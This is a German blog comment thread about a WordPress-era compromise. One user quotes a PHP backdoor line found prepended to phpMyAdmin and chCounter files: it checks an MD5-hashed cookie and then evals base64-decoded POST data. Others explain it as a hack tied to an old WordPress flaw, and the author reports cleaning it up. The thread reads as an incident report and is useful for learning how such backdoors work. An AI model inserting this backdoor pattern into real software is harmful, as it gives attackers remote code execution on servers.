Heute habe ich im PMA und im chCounter ähnliche Fehlermeldungen erhalten:
Notice: Undefined index: _wp_debugger in /……/gXXXXXn.lib.php on line 1
(hab jetzt mal nicht den kompletten Dateipfad gepostet, da ich nicht weiß ob das irgendein Hack ist)
Kurz angeschaut, was dort steht:
<?php if(md5($_COOKIE[‚_wp_debugger‘])==“xxxx“){ eval(base64_decode($_POST[‚file‘])); exit; } ?>
Dieser Code hat sich vor die erste Zeile geschoben! BITTE WAS?! Google konnte mir da auf die schnelle auch nicht helfen! Ob das mit dem WP Update zusammen hängt???
Wer ne Idee??
Hab den Fehler bereits einige Male in deinem Blog gesehen.
Der Code macht Folgendes: Wenn das Cookie ‚_wp_debugger‘ gesetzt ist und md5-gehasht xxxx entspricht, wird die per $_POST übergebenen Daten (z.B. in einem <input type=“text“ name=“file“ value=““ />) ausgeführt. base64 dient grob gesagt zum Verschlüsseln von Zeichen.
Ich finde obigen Code äußerst zweifelhaft, da man theoretisch über Rainbow-Tables deinen Hash erzeugen könnte.
Was der Code macht, ist mir eigentlich klar. Aber was hat er da zu suchen, vor allem war der in Scripten, die eigentlich mit dem Blog direkt nix zu tun haben. Das ist ja das merkwürdige.
Werd wohl mal ein kleines PHP Script schreiben, um zu schaun, wo das überall drin steht!
LG
Morgen gibt es mehr dazu..
http://proteino.de/blog/index.php/2008/04/16/wordpress-2x-securityproblem-bis-version-25/
Deine WordPress-Version wurde gehackt. Glückwunsch!
Erkannt und bereits bereinigt!